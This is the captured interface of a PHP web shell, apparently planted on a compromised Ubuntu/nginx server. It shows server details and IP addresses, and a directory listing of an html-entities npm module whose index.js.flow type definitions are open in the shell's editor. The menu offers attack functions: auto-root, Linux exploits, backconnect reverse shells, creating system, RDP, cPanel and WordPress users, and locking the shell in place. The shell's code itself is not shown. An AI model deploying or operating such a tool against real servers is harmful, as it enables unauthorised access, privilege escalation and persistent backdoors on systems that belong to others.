Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
amatya /
quiz1 /
node_modules /
html-entities /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
index.d.ts
995
B
-rw-rw-rw-
index.js
4.84
KB
-rw-rw-rw-
index.js.flow
1.06
KB
-rw-rw-rw-
index.js.map
3.83
KB
-rw-rw-rw-
named-references.js
73.09
KB
-rw-rw-rw-
named-references.js.map
43.98
KB
-rw-rw-rw-
numeric-unicode-map.js
389
B
-rw-rw-rw-
numeric-unicode-map.js.map
449
B
-rw-rw-rw-
surrogate-pairs.js
583
B
-rw-rw-rw-
surrogate-pairs.js.map
630
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js.flow
/** * Flowtype definitions for index * Generated by Flowgen from a Typescript Definition * Flowgen v1.13.0 * @flow */ export type Level = "xml" | "html4" | "html5" | "all"; declare interface CommonOptions { level?: Level; } export type EncodeMode = | "specialChars" | "nonAscii" | "nonAsciiPrintable" | "nonAsciiPrintableOnly" | "extensive"; export type EncodeOptions = { mode?: EncodeMode, numeric?: "decimal" | "hexadecimal", ... } & CommonOptions; export type DecodeScope = "strict" | "body" | "attribute"; export type DecodeOptions = { scope?: DecodeScope, ... } & CommonOptions; /** * Encodes all the necessary (specified by `level`) characters in the text */ declare export function encode( text: string | void | null, x?: EncodeOptions ): string; /** * Decodes a single entity */ declare export function decodeEntity( entity: string | void | null, x?: CommonOptions ): string; /** * Decodes all entities in the text */ declare export function decode( text: string | void | null, x?: DecodeOptions ): string; declare export {};
Close